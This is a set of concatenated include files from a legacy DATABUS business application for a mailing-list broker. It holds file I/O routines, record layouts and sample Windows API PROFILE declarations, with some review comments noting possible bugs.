. DESCRIPTION : KEY UPDATE MDC MainFILE
.
MTXTUPD BRANCH MTXTFlag TO MTXT6
 CALL MTXTOpen
MTXT6
 FILEPI 1;MTXTFList
 UPDATE MTXTFList;MTXTVars
 RETURN
..............................................................................
.
. ENTRY POINT : MTXTDEL
. REQUIRED : 'MTXTFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
MTXTDEL BRANCH MTXTFlag TO MTXT7
 CALL MTXTOpen
. NOTE(review): lock is taken on MTXTFile but the DELETE targets
. MTXTFList - other entry points pair FILEPI and the verb on the
. same handle; confirm this mismatch is intentional.
MTXT7 FILEPI 1;MTXTFile
 DELETE MTXTFList
 RETURN
..............................................................................
.
. ENTRY POINT : MTXTKP
. REQUIRED : 'MTXTPATH'
. RETURNED : MIN DATACARD text
. DESCRIPTION : KEY SEQUENTIAL prior DATACARD FILE READ
.
MTXTKP
 BRANCH MTXTFLAG,MTXT8
 CALL MTXTOPEN
MTXT8
 trap IOMssg giving Error if IO
 FILEPI 1;MTXTFILE
 READKP MTXTFILE;MTXTVARS
 trapclr IO
 RETURN
..............................................................................
.
. ENTRY POINT : MTXTAIM
. REQUIRED : MTXTFLD1,MTXTFLD2,MTXTFLD4,MTXTFLD5,MTXTFLD6,MTXTFLD7
. RETURNED : MIN DATACARD TEXT
. DESCRIPTION : AIM DATACARD FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
. (NOTE(review): the code below reads with MTXTFLD3 only; the
. REQUIRED list above appears stale - confirm.)
.
MTXTAIM
 BRANCH MTXTFLAG,MTXT9
 CALL MTXTOPEN
MTXT9
 trap IOMssg giving Error if IO
 FILEPI 1;MTXTFILE3
 READ MTXTFILE3,MTXTFLD3;MTXTVARS
 trapclr IO
 RETURN
..............................................................................
.
. ENTRY POINT : MTXTKG
. REQUIRED : VALID PREVIOUS AIM READ
. RETURNED : DATACARD RECORD
. DESCRIPTION : AIM KEY GENERIC DATACARD FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
. (NOTE(review): trapclr IO without a preceding trap here, unlike
. MTXT9/MTXT11 - possibly a missing trap line; confirm.)
.
MTXTKG
 BRANCH MTXTFLAG,MTXT10
 CALL MTXTOPEN
MTXT10
 FILEPI 1;MTXTFILE3
 READKG MTXTFILE3;MTXTVARS
 trapclr IO
 RETURN
..............................................................................
.
. ENTRY POINT : MTXTKGP
. REQUIRED : PREVIOUS VALID AIM READ
. RETURNED : MIN DATACARD TEXT
. DESCRIPTION : KEY GENERIC PRIOR DATACARD FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
MTXTKGP
 BRANCH MTXTFLAG,MTXT11
 CALL MTXTOPEN
MTXT11
 trap IOMssg giving Error if IO
 FILEPI 1;MTXTFILE3
 READKGP MTXTFILE3;MTXTVARS
 trapclr IO
 RETURN
..............................................................................
.
. ENTRY POINT : MTXTOpen
. REQUIRED : 'MTXTFlag' 'MTXTPATH'
. RETURNED : 'MTXTFlag' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN MDC MainFILE (opens the whole filelist)
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
MTXTOpen TRAP MTXTGONE giving error IF IO
 OPEN MTXTFList
 TRAPCLR IO
 MOVE C1 TO MTXTFlag
 RETURN
..............................................................................
MTXTGONE MOVE MTXTNAME TO FILENAME
 CALL FILEGONE
..............................................................................
<file_sep>/include/M2Ndd.inc
.* MIN 2 NIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MIN2NIN
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam fixed
......................................................
. LAST MODIFIED
. patch 1.1 20 November 2006 DLH Move owner info to its own file
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDCTXTDD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDCTXTDD - Owner
.MDCTXTDD - Text
.M2nLodd - list owner xref
......................................................
. MIN-to-NIN list cross-reference: maps a MIN list/owner code to the
. corresponding NIN list number.
M2NNAME INit "Min2Nin"
M2nFlist Filelist
M2NFILE IFILE Name="Min2nin.Isi|NINS1:502"
M2NFILE2 IFILE Name="Min2nin2.Isi|NINS1:502"
 FileListEnd
M2NFLAG FORM 1
M2NPATH FORM 1
M2NFld Dim 6
M2NFld2 Dim 6
.
M2NVARS LIST .
M2NMin Dim 6 1-6 6 byte Min LIst code or right justified 5 byte owner code
M2NStatus dim 1 7-7 "*" = Special do not update
. special pricing -- need to print min list for counts etc - argh
M2NNIN DIM 6 8-13 NIN List #
 ListEnd
<file_sep>/include/nmtxdd.inc
* NMTXDD/INC.
* *****************************************************************************
* NAMES IN THE NEWS MASTER MAILER TAX FILE.
* *****************************************************************************
.
. FILE: NINMTAX
. LENGTH: 36 (was 34; extended by mtxproft at 36-36)
.COMPRESS: NONE
. TYPE: ISAM,FIXED
. KEY: NMTXFLD
...............................................................................
.
. Master mailer tax file: keyed by 6-byte mailer number; fixed 36
. bytes (byte 36 'mtxproft' was a later addition).
NMTXFILE IFILE KEYLEN=6,FIX=36
NMTXNAME INIT "NINMTAX|NINS1:502 "
NMTXFLD DIM 6
NMTXFLAG FORM 1
.
mtxvars list
MTXNUM DIM 6 1-6 MAILER NUMBER ---KEY--.
MTXCD DIM 5 7-11 TAX AREA CODE
MTXPERC DIM 2 12-13 TAX PERCENTAGE
MTXCODE DIM 1 14-14 CODE TO INDICATE WHICH EXEMPTION
MTXEXMPT DIM 20 15-34 EXEMPTION NUMBER
MTXC501 DIM 1 35-35 C501 STATUS MUST BE '3', '4', ' ',
. OR '5'.
mtxproft dim 1 36-36 "Y" = For Profit company. 9/20/dlh
 listend
. LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
.CHECKWRITER DATABUS
.LISTNIN DATABUS
.LISTNIN1 DATABUS
.MLRMOD DATABUS
.NINP21 DATABUS
. LISTON
<file_sep>/include/IncLio.inc
..............................................................................
.
. INCLIO INCLUSION
. NIN income report FILE I/O ROUTINES
.
.
..............................................................................
.
. ENTRY POINT : INCLKEY
. REQUIRED : 'INCLFLD'
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. INCLKEY: exact ISAM read by INCLFLD into INCLVARS. Every entry
. point traps IO to IOMssg (giving Error) and runs under a FILEPI
. file lock; the trap is cleared after the operation.
INCLKEY BRANCH INCLFLAG TO INCL1
 CALL INCLOPEN
INCL1 trap IOMSSG GIVING ERROR if IO
 FILEPI 1;INCLFILE
 READ INCLFILE,INCLFLD;INCLVARS
 TRAPCLR IO
 RETURN
..............................................................................
.
. ENTRY POINT : INCLTST
. REQUIRED : INCLFLD
. RETURNED :
. DESCRIPTION : TEST KEY (record read into STR1 only)
.
INCLTST BRANCH INCLFLAG TO INCL2
 CALL INCLOPEN
INCL2 trap IOMSSG GIVING ERROR if IO
 FILEPI 1;INCLFILE
 READ INCLFILE,INCLFLD;STR1
 TRAPCLR IO
 RETURN
..............................................................................
.
. ENTRY POINT : INCLKS
. REQUIRED :
. DESCRIPTION : KEY SEQUENTIAL RETURN-TO FILE READ
.
INCLKS BRANCH INCLFLAG TO INCL3
 CALL INCLOPEN
INCL3 trap IOMSSG GIVING ERROR if IO
 FILEPI 1;INCLFILE
 READKS INCLFILE;INCLVARS
 TRAPCLR IO
 RETURN
..............................................................................
.
. ENTRY POINT : INCLSEQ
. REQUIRED :
. RETURNED : RETURN-TO RECORD
. DESCRIPTION : SEQUENTIAL RETURN-TO FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
INCLSEQ BRANCH INCLFLAG TO INCL4
 CALL INCLOPEN
INCL4 trap IOMSSG GIVING ERROR if IO
 FILEPI 1;INCLFILE
 READ INCLFILE,SEQ;INCLVARS
 TRAPCLR IO
 RETURN
..............................................................................
.
. ENTRY POINT : INCLWRT
. REQUIRED : 'INCLFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
INCLWRT Branch INCLFLAG to INCL5
 CALL INCLOPEN
INCL5 TRAP IOMSSG GIVING ERROR IF IO
 FILEPI 1;INCLFILE
 WRITE INCLFILE,INCLFLD;INCLVARS
 TRAPCLR IO
 RETURN
..............................................................................
.
. ENTRY POINT : INCLUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE RETURN-TO FILE
.
INCLUPD BRANCH INCLFLAG TO INCL6
 CALL INCLOPEN
INCL6 TRAP IOMSSG GIVING ERROR IF IO
 FILEPI 1;INCLFILE
 UPDATE INCLFILE;INCLVARS
 TRAPCLR IO
 RETURN
..............................................................................
.
. ENTRY POINT : INCLDEL
. REQUIRED : 'INCLFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
INCLDEL BRANCH INCLFLAG TO INCL7
 CALL INCLOPEN
INCL7 TRAP IOMSSG GIVING ERROR IF IO
 FILEPI 1;INCLFILE
 DELETE INCLFILE,INCLFLD
 TRAPCLR IO
 RETURN
...............................................................................
..............................................................................
.
. ENTRY POINT : INCLOPEN
. REQUIRED : 'INCLFLAG'
. RETURNED : 'INCLFLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
INCLOPEN TRAP INCLGONE IF IO
.
INCLOP
 OPEN INCLFILE,INCLNAME
 TRAPCLR IO
 MOVE C1 TO INCLFLAG
 RETURN
..............................................................................
INCLGONE MOVE INCLNAME TO FILENAME
 CALL FILEGONE
..............................................................................
<file_sep>/include/NPGEDD.INC
*******************************************************************************
*INDEXVAR.INC - VARIABLE INCLUDE FOR EOM INDEXES.
*******************************************************************************
* LENGTH 66
*
* ACCESS SEQUENTIAL.
***********************
. RELEASE 1.1 ASH 06DEC2004 - INCREASED COMPANY FIELD AND ADDED NEW PAGE NUMBER FIELD
.
.START PATCH 1.1 REPLACED LOGIC
.NPGEFILE FILE FIXED=60
.NPGEFLAG FORM 1
..NPGENAME INIT "PAGEXXXX "
..NPGENAME dim 6
.NPGENAME Init "\\NINS1\e\data\page.srt"
..
.INDNUM FORM 2 INDEX TYPE.
.. 1 = STATEMENT EDIT.
.. 2 = PAYABLES REPORT.
.. 3 = MONEY ON ACCOUNT.
.. 4 = INCOME BY MAILER.
.. 5 = INCOME BY LIST.
.. 6 = OVER 90 DAY STATEMENT.
.. 7 = STATEMENT EDIT BY INVOICE DATE.
.. 8 = BAD DEBT STATEMENT EDIT.
.. 9 = open with prepay to lo.
.INDMNUM DIM 4 MAILER/OWNER/ETC NUMBER.
.INDNAME DIM 25 CONTACT NAME.
.INDCOMP DIM 25 COMPANY NAME.
.INDPAGE DIM 4 PAGE NUMBER
...................................................
. EOM report page-index record (66 bytes): sort work file plus a
. keyed .isi copy (NPGEFLE2) for lookup by mailer/owner number.
NPGEFILE FILE FIXED=66
NPGEFLAG FORM 1
NPGEFLG2 FORM 1
.START PATCH 01/20/2005 ASH REPLACED LOGIC
.NPGENAME Init "\\NINS1\e\data\page.srt "
NPGENAME Init "page.srt "
.END PATCH 01/20/2005 ASH REPLACED LOGIC
.
NPGEFLE2 IFILE KEYLEN=6,FIXED=66,Name="page.isi"
NPGEFLD dim 6
.
NPGEVARS LIST
INDNUM FORM 2 1-2 INDEX TYPE.
. 1 = STATEMENT EDIT.
. 2 = PAYABLES REPORT.
. 3 = MONEY ON ACCOUNT.
. 4 = INCOME BY MAILER.
. 5 = INCOME BY LIST.
. 6 = OVER 90 DAY STATEMENT.
. 7 = STATEMENT EDIT BY INVOICE DATE.
. 8 = BAD DEBT STATEMENT EDIT.
. 9 = open with prepay to lo.
INDMNUM DIM 6 3-8 MAILER/OWNER/ETC NUMBER
INDNAME DIM 25 9-33 CONTACT NAME.
INDCOMP DIM 25 34-58 COMPANY NAME.
INDPAGE DIM 4 59-62 PAGE NUMBER
INDPAGE2 DIM 4 63-66 PAGE NUMBER
 LISTEND
.END PATCH 1.1 REPLACED LOGIC
<file_sep>/include/NCOUNTSI.INC
*******************************************************************************
.CLISTRD - READ LIST NAME.
. CLISTRD - read the list-name record for CTKEY from the COUNTS file.
. All readers here signal "record missing" by returning OVER = "Y"
. (via NOCTREC); FORMAT errors go to the CTFORMAT prompt.
CLISTRD TRAP CTFORMAT IF FORMAT
 MOVE "N" TO OVER
 READ COUNTS,CTKEY;CTKEY,CTLISTN
 GOTO NOCTREC IF OVER
 RETURN
*******************************************************************************
.CSEXRD - READ SEX COUNTS.
CSEXRD TRAP CTFORMAT IF FORMAT
 MOVE "N" TO OVER
 READ COUNTS,CTKEY;CTKEY,CTMALE,CTFEMALE,CTDUAL,CTCOMP,CTUNKN:
 CTSEED
 GOTO NOCTREC IF OVER
 RETURN
*******************************************************************************
.CSCFRD - READ SCF COUNTS.
CSCFRD TRAP CTFORMAT IF FORMAT
 MOVE "N" TO OVER
 READ COUNTS,CTKEY;CTKEY,CTUNKN,CTFEMALE,CTMALE,CTDUAL,CTCOMP:
 CTTOTAL
 GOTO NOCTREC IF OVER
 RETURN
*******************************************************************************
.CSCFRDKS- READ SCF COUNTS (key sequential; traps to the silent
. FORMAT handler below rather than the interactive CTFORMAT prompt).
CSCFRDKS TRAP FORMAT IF FORMAT
 MOVE "N" TO OVER
 READKS COUNTS;CTKEY,CTUNKN,CTFEMALE,CTMALE,CTDUAL,CTCOMP:
 CTTOTAL
 GOTO NOCTREC IF OVER
. SCAN "SCF" IN CTKEY
. RETURN IF EQUAL
 MOVE "SCF" TO SCF
. GOTO NOCTREC
 RETURN
*******************************************************************************
.CSCFRDKP- READ SCF COUNTS (key prior; RANGE also trapped).
CSCFRDKP TRAP KPFORMAT IF FORMAT
 TRAP KPFORMAT IF RANGE
 MOVE "N" TO OVER
 READKP COUNTS;CTKEY,CTUNKN,CTFEMALE,CTMALE,CTDUAL,CTCOMP:
 CTTOTAL
 GOTO NOCTREC IF OVER
 RETURN
...............................................................................
. KPFORMAT: silent handler for CSCFRDKP - flag OVER and resume caller.
KPFORMAT MOVE "Y" TO OVER
 TRAPCLR FORMAT
 TRAPCLR RANGE
 NORETURN
 RETURN
*******************************************************************************
.CZIPRD - READ ZIP COUNTS.
CZIPRD TRAP CTFORMAT IF FORMAT
 MOVE "N" TO OVER
 READ COUNTS,CTKEY;CTKEY,CTTOTAL
 GOTO NOCTREC IF OVER
 RETURN
*******************************************************************************
.CZIPRDKS - READ ZIP COUNTS.
CZIPRDKS TRAP CTFORMAT IF FORMAT
 MOVE "N" TO OVER
 READKS COUNTS;CTKEY,CTTOTAL
 GOTO NOCTREC IF OVER
 RETURN
*******************************************************************************
.CDTTRD - READ UPDATE RECORD
CDTTRD TRAP CTFORMAT IF FORMAT
 MOVE "N" TO OVER
 READ COUNTS,CTKEY;CTKEY,CTDATE
 GOTO NOCTREC IF OVER
 RETURN
. NOCTREC: common "no record" exit - callers test OVER = "Y".
NOCTREC
 MOVE "Y" TO OVER
 RETURN
. CTFORMAT: interactive format-error prompt; Q resumes, X stops run.
CTFORMAT
 TRAPCLR FORMAT
CTFORMT1 KEYIN *P1:24,*EL,"FORMAT ERROR INFORM COMPUTER PERSONNEL!!!!",*B:
 *B,*B,*B,*B,ANS,*P1:24,*EL;
 CMATCH "Q" TO ANS
 RETURN IF EQUAL
 CMATCH "X" TO ANS
 STOP IF EQUAL
 GOTO CTFORMT1
*******************************************************************************
. FORMAT: silent format handler used by CSCFRDKS - flags no-record.
FORMAT TRAPCLR FORMAT
 NORETURN
 CALL NOCTREC
 RETURN
*******************************************************************************
.END OF INCLUDE
*******************************************************************************
<file_sep>/include/NDATEDD.INC
. .............................................................................
.
. *** VARIABLES USED IN DATE HANDLING ROUTINES.
.
. .............................................................................
.
. Shared work variables for the date-handling routines.
DATE DIM 6 DATE
DATE1 FORM 6
DATEM1 FORM 2 TEMP VARIABLE USED FOR EDIT CHECKS
DATEM2 FORM 2 TEMP VARIABLE USED FOR EDIT CHECKS
.CC FORM "19" CENTURY
YYMMDD FORM 6 DATE IN YYMMDD FORMAT (USED FOR DATE COMPARISON).
DAYSMO FORM 2 DAYS IN THE MONTH
LEAPYR DIM 1 LEAPYR = 'Y' IF LEAP YEAR; 'N' IF NOT
KEYDAT DIM 1 'Y' IF VALID DATE INPUT.
MMNAM DIM 3 MONTH NAME
.
. .............................................................................
<file_sep>/include/tinvdd.inc
..............................................................................
.
. TINVDD INCLUSION
. TDMC INVOICE FILE DEFINITION
.
. FILE NAME : TDMCINV
. REC LENGTH: 91 FIXED
. INDEX KEY : 1-6 (lr dupes allowed)
..............................................................................
.
. TDMC invoice file: keyed by NIN LR number, duplicates allowed
. (one record per invoice line for the same LR).
TINVFILE IFILE KEYLEN=6,dup,Name="TDMCINV.isi|NINS1:502"
TINVNAME INIT "TDMCINV|NINS1:502"
TINVFLD DIM 6
TINVFLAG FORM 1
TINVLOCK FORM 1 0 or 1=File locks, 2=Record locks, 3=No locks
.
Tinvvars list
TINVLR DIM 6 001-006 NIN LR #
TINVB1 DIM 4 007-010 BLANK
.TINVdate DIM 6 011-016 Date
TINVdate DIM 8 011-018 Date ccyymmdd SB INVOICE DATE
TINVdesc DIM 30 019-048 NAME
.TinvINV DIM 6 049-054 TDMC ID NUM
TinvINV DIM 11 049-059 TDMC ID NUM
TinvDOLR DIM 12 060-071 $$$$
.begin patch
tinvOrd dim 11 072-082 infogroup order #
TinvFiller DIM 9 083-091
.TinvFiller DIM 20 072-091
 listend
.temporary hold vars (saved copies of the matching record fields)
TinvDolrH DIM 12 $$$$
TINVdateH DIM 8 Date ccyymmdd
TinvINVH DIM 11 049-059 TDMC ID NUM
.New file format (proposed layout, not yet in use)
.TinvACt DIM 6 001-006 TDMC Account ID
.tinvb2 dim 2 007-008
.tinvid dim 6 009-014
.TINVLR DIM 6 015-020 NIN LR #
.TINVB1 DIM 4 021-064 BLANK
.TINVdate DIM 6 025-030 Date
.TINVdesc DIM 30 031-060 NAME
.TinvDOLR DIM 12 0?????? $$$$
..............................................................................*
<file_sep>/include/nftplogio.inc
//..............................................................................
// NFTPLOG2IO INCLUSION
// NIN DATACARD ADDRESSING FILE I/O ROUTINES
// FILE NAME : NINFTPLOG
// REC LENGTH: 346 VAR
// INDEX KEY : 6 (6 BYTE COMP NUMBER), 100 File NAME(AAM)
//..............................................................................
// ENTRY POINT : NFTPLOGKEY
// REQUIRED : 'NFTPLOGFLD'
// RETURNED : DATACARD ADDRESSING RECORD
// DESCRIPTION : EXACT ISAM KEY READ
// APPLICATION'S RESPONSIBILITY TO TEST FLAGS
//NFTPLOGKEY
// BRANCH NFTPLOGFLAG,NFTPLOG1
// CALL NFTPLOGOPEN
//NFTPLOG1
// trap IOMssg giving Error if IO
// READ NFTPLOGFILE,NFTPLOGFLD;NFTPLOGVARS
// trapclr IO
// RETURN
//..............................................................................
//
// ENTRY POINT : NFTPLOGTST
// REQUIRED : NFTPLOGFLD
// RETURNED :
// DESCRIPTION : TEST KEY
//NFTPLOGTST
// BRANCH NFTPLOGFLAG,NFTPLOG2
// CALL NFTPLOGOPEN
//NFTPLOG2
// trap IOMssg giving Error if IO
// READ NFTPLOGFILE,NFTPLOGFLD;;
// trapclr IO
// RETURN
//..............................................................................
// ENTRY POINT : NFTPLOGKS
// REQUIRED :
// RETURNED : DATACARD ADDRESSING RECORD
// DESCRIPTION : KEY SEQUENTIAL DATACARD ADDRESSING FILE READ
//NFTPLOGKS
// BRANCH NFTPLOGFLAG,NFTPLOG3
// CALL NFTPLOGOPEN
//NFTPLOG3
// trap IOMssg giving Error if IO
// READKS NFTPLOGFILE;NFTPLOGVARS
// trapclr IO
// RETURN
//..............................................................................
// ENTRY POINT : NFTPLOGSEQ
// REQUIRED :
// RETURNED : DATACARD ADDRESSING RECORD
// DESCRIPTION : SEQUENTIAL DATACARD ADDRESSING FILE READ
// APPLICATION'S RESPONSIBILITY TO TEST FLAGS
NFTPLOGSEQ
BRANCH NFTPLOGFLAG,NFTPLOG4
CALL NFTPLOGOPEN
NFTPLOG4
trap IOMssg giving Error if IO
READ NFTPLOGFILE,SEQ;NFTPLOGVARS
trapclr IO
RETURN
//..............................................................................
// ENTRY POINT : NFTPLOGWRT
// REQUIRED : 'NFTPLOGFLD'
// RETURNED :
// DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
NFTPLOGWRT
BRANCH NFTPLOGFLAG,NFTPLOG5
CALL NFTPLOGOPEN
NFTPLOG5
trap IOMssg giving Error if IO
FILEPI 1;NFTPLOGFLIST
WRITE NFTPLOGFLIST;NFTPLOGVARS
trapclr IO
RETURN
//.............................................................................
// ENTRY POINT : NFTPLOGUPD
// REQUIRED : A PREVIOUS KEY READ
// RETURNED :
// DESCRIPTION : KEY UPDATE RECORD NUMBER FILE
NFTPLOGUPD
BRANCH NFTPLOGFLAG,NFTPLOG6
CALL NFTPLOGOPEN
NFTPLOG6
trap IOMssg giving Error if IO
FILEPI 1;NFTPLOGFLIST
UPDATE NFTPLOGFLIST;NFTPLOGVARS
trapclr IO
RETURN
//..............................................................................
// ENTRY POINT : NFTPLOGDEL
// REQUIRED : 'NFTPLOGFLD'
// RETURNED :
// DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
//
NFTPLOGDEL
// Delete the record addressed by the current key (NFTPLOGFLD per header).
	BRANCH NFTPLOGFLAG,NFTPLOG7
	CALL NFTPLOGOPEN
NFTPLOG7
	trap IOMssg giving Error if IO
// Interlock the file list for the DELETE that follows.
	FILEPI 1;NFTPLOGFLIST
	DELETE NFTPLOGFLIST
	trapclr IO
	RETURN
//..............................................................................
// ENTRY POINT : NFTPLOGAIM
// REQUIRED : NFTPLOGFLD1,NFTPLOGFLD2
// RETURNED : RECORD
// DESCRIPTION : AIM FILE READ
// APPLICATION'S RESPONSIBILITY TO TEST FLAGS
NFTPLOGAIM
// AIM (associative) read on the secondary file using two search fields.
// Caller must test the I/O flags afterwards (see header above).
	BRANCH NFTPLOGFLAG,NFTPLOG8
	CALL NFTPLOGOPEN
NFTPLOG8
	trap IOMssg giving Error if IO
	READ NFTPLOGFLE2,NFTPLOGFLD1,NFTPLOGFLD2;NFTPLOGVARS
	trapclr IO
	RETURN
//..............................................................................
// ENTRY POINT : NFTPLOGKG
// REQUIRED : VALID PREVIOUS AIM READ
// RETURNED : RECORD
// DESCRIPTION : AIM KEY GENERIC FILE READ
// APPLICATION'S RESPONSIBILITY TO TEST FLAGS
NFTPLOGKG
// Key-generic (next matching) AIM read; requires a valid previous AIM READ.
	BRANCH NFTPLOGFLAG,NFTPLOG10
	CALL NFTPLOGOPEN
NFTPLOG10
	trap IOMssg giving Error if IO
	READKG NFTPLOGFLE2;NFTPLOGVARS
	trapclr IO
	RETURN
//..............................................................................
//
// ENTRY POINT : NFTPLOGOPEN
// REQUIRED : 'NFTPLOGFLAG'
// RETURNED    : 'NFTPLOGFLAG' SET TO '1' IF OPENED
// DESCRIPTION : OPEN NIN DATACARD ADDRESSING FILE
// DISPLAY ERROR AND ABORT IF NOT ON-LINE.
NFTPLOGOPEN
// Open the file list exclusively; on I/O failure control goes to NFTPLOGGONE.
	TRAP NFTPLOGGONE giving Error if IO
	OPEN NFTPLOGFLIST .,EXCLUSIVE
	trapclr IO
// Mark the file open so the other entry points skip the OPEN from now on.
	MOVE C1,NFTPLOGFLAG
	RETURN
NFTPLOGGONE
// Report the unavailable file through the shared FILEGONE handler (aborts).
	MOVE NFTPLOGNAME,FILENAME
	CALL FILEGONE
//..............................................................................<file_sep>/include/NCATCODEDD.inc
* NCATCODEDD.INC
* ************************************************************************************************
**
* NAMES IN THE NEWS MASTER CATEGORY CODES REFERENCE FILE
* ************************************************************************************************
**
.
. FILE: NINCODE
. LENGTH: 528
. TYPE: ISAM/AAM
. KEY: 1-6 NCATCODENUM (LIST NUM)
. AAMKEY: (1) 7-7 NCATCODETYPE
. (2) 8-77 NCATCODEMARKET
. (3) 78-147 NCATCODESUBMARK
. (4) 148-217 NCATCODEENV
. (5) 218-287 NCATCODEPOLIT
. (6) 288-357 NCATCODEHEALTH
. (7) 358-427 NCATCODEPROG
. (8) 428-428 NCATCODEFOCUS
...................................................................................................
..
NCATCODENAME INIT "NINCODE"
NCATCODEFLIST FILELIST
NCATCODEFILE IFILE KEYLEN=6,FIXED=528,Name="NINCODE.isi"
NCATCODEFLE2 AFILE FIXED=528,Name="NINCODE.aam"
              FILELISTEND
NCATCODEFLAG FORM 1 // nonzero once the file list has been opened
. NOTE(review): each search DIM below is 3 bytes larger than the matching
. record field (e.g. 4 for the 1-byte type, 73 for the 70-byte markets) —
. presumably room for AIM search control characters; verify before resizing.
NCATCODEFLD DIM 6 // HOLD LIST NUM
NCATCODEFLD1 DIM 4 // LIST TYPE
NCATCODEFLD2 DIM 73 // BROAD MARKET
NCATCODEFLD3 DIM 73 // SUB-MARKET
NCATCODEFLD4 DIM 73 // ENVIRON
NCATCODEFLD5 DIM 73 // POLITICAL
NCATCODEFLD6 DIM 73 // HEALTH/CHARIT
NCATCODEFLD7 DIM 73 // PROGRESSIVE
NCATCODEFLD8 DIM 4 // LIST FOCUS
.
. Record layout (528 bytes fixed; offsets per the header block above).
NCATCODEVARS LIST
NCATCODENUM DIM 6 1-6 LIST NUMBER
NCATCODETYPE DIM 1 7-7 LIST TYPE
.1 "B" Byrs/Subs
.2 "D" Dnrs/Mbrs
.3 "C" Compiled
.4 "M" Misc.
NCATCODEMARKET DIM 70 8-77 BROAD MARKET
NCATCODESUBMARK DIM 70 78-147 SUB-MARKET
NCATCODEENV DIM 70 148-217 ENVIRONMENTAL
NCATCODEPOLIT DIM 70 218-287 POLITICAL
NCATCODEHEALTH DIM 70 288-357 HEALTH/CHARIT
NCATCODEPROG DIM 70 358-427 PROGRESSIVE
NCATCODEFOCUS DIM 1 428-428 LIST FOCUS
.1 "C" Christian
.2 "V" Veterans
.3 "P" Pets
.4 "W" Women
.5 "K" Children
.6 "S" Seniors
.7 "G" Gay/Lesbian
.8 "J" Jewish
NCATCODEFILL DIM 100 429-528 pad to the 528-byte fixed record length
LISTEND
<file_sep>/include/PROFILE.INC
*==============================================================================
.
. Date: 19 May 1995
.
. Purpose: This include provides sample PROFILE Winapi function definitions.
.
*==============================================================================
.
. PROFILE declarations defines the parameter criteria needed to use an
. API function. The compiler uses the PROFILE definition to verify the
. syntax of a WINAPI statement. The PROFILE definitions also control the
. WINAPI statement setup to execute and return values for an API function.
.        See the SDBWIN.RFM for specific syntax and type parameters.
.
.
. Format:
.
.<Label> PROFILE DllName,EntryName,TypeRet[,TypeParm1[,TypeParm2...]]
.
. Where: DllName - Defines the DLL name which contains the API to be
. used for a statement using this profile.
.
. EntryName - Defines the actual API system call name to be used.
.
. If the function is a UNICODE enabled function, then
. the name must have a character 'A' (ASCII) or 'W'
. (WIDE) appended to it. A UNICODE enabled function
. can be determined when a parameter of the API
. function is string variable. The 'A' character
. indicates that the string parameters contain ASCII
. zero terminated data. The 'W' indicates that the
. string parameters contain UNICODE string data.
.
. TypeRet - This defines the data type of the variable which will
. receive the result of the API call. This field can
. be any of the keywords defined in the following type
. indicators.
.
. INT1 - Defines an INTEGER 1 type.
. INT2 - Defines an INTEGER 2 type.
. INT4 - Defines an INTEGER 4 type.
. DIM - Defines a string data type.
. PINT1 - Defines an INTEGER 1 pointer type.
. PINT2 - Defines an INTEGER 2 pointer type.
. PINT4 - Defines an INTEGER 4 pointer type.
. NONE - Defines nothing returned. This is only valid for the
. return value operand.
.
. TypeParm1 - This defines the data type of the first parameter
. used for an API call.
.
. TypeParm2 - This defines the data type of the second parameter
. used for an API call.
.
.
*---GetVersion-----------------------------------------------------------------
.
. The PROFILE labeled 'GetVer' defines the parameters needed to execute
. the Window's API function 'GetVersion'. The function returns a hex value
. whose high and low order bytes define release and version of Windows being
. executed. There are three parameters defined as follows:
.
. 1. kernel32 - This defines a basic Window's DLL module to use.
.
. 2. GetVersion - This defines the API function name to be executed
. by a WINAPI statement when using this PROFILE.
.
. 3. INT2 - The third operand defines the type of variable
. to be used for a RETURN value. In this case we
. are only requesting a 16 bit value be returned.
.
GetVer PROFILE kernel32, GetVersion, INT2
.
*---GetDriveType---------------------------------------------------------------
.
. The PROFILE labeled 'GetDrv' defines the parameters needed to execute
. the Window's API function 'GetDriveType'. The function returns a value
. which identifies the type of drive being used. There are four parameters
. defined as follows:
.
. 1. kernel32 - This defines a basic Window's DLL module to use.
.
. 2. GetDriveTypeA - This defines the API function name to be executed
. by a WINAPI statement when using this PROFILE.
. You will note that the character 'A' has been
. appended to the function name. This is required
. by Windows to identify the format of string data
. used in the parameter list. In this case, the
. DIM parameter in the parameter list contains
. an ASCII string terminated with a binary zero.
.
. 3. INT4 - The third operand defines the type of variable
. to be used for a RETURN value. In this case we
. are only requesting a 32 bit value be returned.
.
. 0 - Function cannot determine drive type.
. 1 - Specified drive does not exist.
. 2 - Drive removeable.
. 3 - Drive fixed.
. 4 - Drive remote (network).
.
. 4. DIM - The fourth operand defines the type of variable
. to be used for the first variable in the parameter
. list. In this case the variable is a DIM type.
. Note that the 'A' at the end of the function name
. indicates that this variable should contain an
. ASCII string terminated with a binary zero.
.
GetDrv PROFILE kernel32, GetDriveTypeA, INT4, DIM
.
*---GetWindowsDirectory--------------------------------------------------------
.
. The PROFILE labeled 'GetName' defines the parameters needed to execute
. the Window's API function 'GetWindowsDirectory'. The function returns a
. value which indicates if the function work or not. In addition, the name
. of the Windows directory is placed into the DIM variable found in the
. parameter list. There are four parameters defined as follows:
.
